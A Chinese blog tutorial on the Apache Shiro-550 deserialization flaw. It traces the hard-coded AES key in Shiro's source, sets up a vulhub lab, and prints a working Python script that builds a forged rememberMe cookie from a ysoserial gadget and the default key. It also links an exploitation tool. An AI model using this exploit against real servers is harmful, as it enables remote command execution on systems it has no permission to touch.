当前位置：首页 > news >正文

深入浅出带你学习shiro-550漏洞

news 2026/1/30 18:23:44

//发点去年存货

前言

apache shiro是一个java安全框架，作用是提供身份验证，Apache Shiro框架提供了一个Rememberme的功能,存储在cookie里面的Key里面，攻击者可以使用Shiro的默认密钥构造恶意序列化对象进行编码来伪造用户的 Cookie，服务端反序列化时触发漏洞，从而执行命令。
影响版本如下：

Apache shiro <= 1.2.4

下面我们展开来讲讲该漏洞是如何利用的。

利用

在服务器接受带有shiro框架的服务请求时，cookie会经过以下几个步骤：

1.服务器会先检索RememberMe cookie的值
2.之后进行base64解码
3.接着使用aes解码
4.最后进行反序列化操作

其中AES加密cookie的值时利用的是加密密钥硬编码，也就是说有一定几率的可以进行破解，因此可能存在伪造cookie来进行恶意反序列化的攻击。
下面我们具体分析一下，先看org/apache/shiro/mgt/DefaultSecurityManager.java：
里面有一个方法叫getRememberedSerializedIdentity ，简单看一下就是：
在这里插入图片描述可以看到里面获取了请求的cookie值再进行了base64编码，于是我们接着看谁调用了它，于是找到了getRememberedPrincipals ：

在这里插入图片描述将解码后信息放进了一个数组里，然后使用了这个名为convertbytestoprincipals方法去处理，继续跟进了，发现该方法对信息进行了decrypt解密，继续跟进一下：

protected byte[] decrypt(byte[] encrypted) {byte[] serialized = encrypted;CipherService cipherService = getCipherService();if (cipherService != null) {ByteSource byteSource = cipherService.decrypt(encrypted, getDecryptionCipherKey());serialized = byteSource.getBytes();}return serialized;
}

可以看到这是一个获取加密再进行解密的过程，我们跟进getDecryptionCipherKey() ，根据返回值一直跟进到setCipherKey ，发现：

setCipherKey(DEFAULT_CIPHER_KEY_BYTES);

我们找到了这个固定的加密的key：

在这里插入图片描述那我们如何进行反序列化呢，这里需要回到convertbytestoprincipals：

在这里插入图片描述跟进deserialize，发现了两个实现方法，而且都是调用的原生readobject:

在这里插入图片描述

实例

这里以一个例题为例，我们先搭建个靶机：

cd /vulhub/shiro/CVE-2016-4437
docker-compose up -d

进入靶机的页面就是一个带有记住功能的登陆页面：

在这里插入图片描述抓包后改cookie值发现返回了以下数据，rememberme=deleteme,也就说明可能存在漏洞：

在这里插入图片描述这里贴一个基于YSOSERIAL反序列化工具的python脚本：

# -*- coding: utf-8 -*-
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)BS = AES.block_sizepad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==") # 替换密钥iv = uuid.uuid4().bytesencryptor = AES.new(key, AES.MODE_CBC, iv)file_body = pad(popen.stdout.read())base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))return base64_ciphertext
if __name__ == '__main__':payload = encode_rememberme(sys.argv[1])
print "rememberMe={0}".format(payload.decode())

生成后替换cookie即可，当然也有图形化页面的攻击方法：

项目地址：https://github.com/feihong-cs/ShiroExploit-Deprecated

页面如下，输入要检测的ip地址设置攻击方法即可，非常方便：

在这里插入图片描述选择检测方式后会进行检测，如果出现find valid gadget就说明可以利用，我们就可以从工具上输入我们要执行的漏洞了。

结语

简单带大家总结了一下shiro550反序列化漏洞，不知道大家学习的怎么样了，简单来看shiro框架命令执行的的执行流程可以简单概括为：命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值，我们根据上面源码的分析以及它硬编码的特性，便可以进行攻击，当然这只是最简单的利用，我们也可以结合其他利用链来构造攻击链接，有兴趣的小伙伴可以自己去尝试一下。

深入浅出带你学习shiro-550漏洞

前言

利用

实例

结语

相关文章：

深入浅出带你学习shiro-550漏洞

项目（今日指数之环境搭建）

PCL 基于投影点密度的建筑物立面提取

DDD 参考工程架构

重建，是2023年的关键词

动手写操作系统-00-环境搭建以及资料收集

【scipy.sparse包】Python稀疏矩阵详解

从写下第1个脚本到年薪30W，我的自动化测试心路历程

JAVA八股、JAVA面经

GAN系列基础知识

Linux/CenterOS 7.9配置汉化gitlab服务器

山洪灾害监测预警平台山洪灾害监测预警系统解决方案以人为本科学防御

The Number Of ThreadPoolExecutor

Linux（Linux各目录结构详解）

UART通讯简介

80 90后表示真干不过，部门新来的00后已经把我卷奔溃了，不想干了····

Python中2.x 与 3.x 版本区别？

性能指南笔记一

es数据导入导出

Python3入门教程||Python3 字符串||Python3 列表

多云管理“拦路虎”：深入解析网络互联、身份同步与成本可视化的技术复杂度

渗透实战PortSwigger靶场-XSS Lab 14：大多数标签和属性被阻止

Nginx server_name 配置说明

Kubernetes 节点自动伸缩（Cluster Autoscaler）原理与实践

十二、【ESP32全栈开发指南： IDF开发环境下cJSON使用】

【系统架构设计师-2025上半年真题】综合知识-参考答案及部分详解（回忆版）

Linux【5】-----编译和烧写Linux系统镜像（RK3568）

SDU棋界精灵——硬件程序ESP32实现opus编码

Springboot多数据源配置实践

详解鸿蒙Next仓颉开发语言中的动画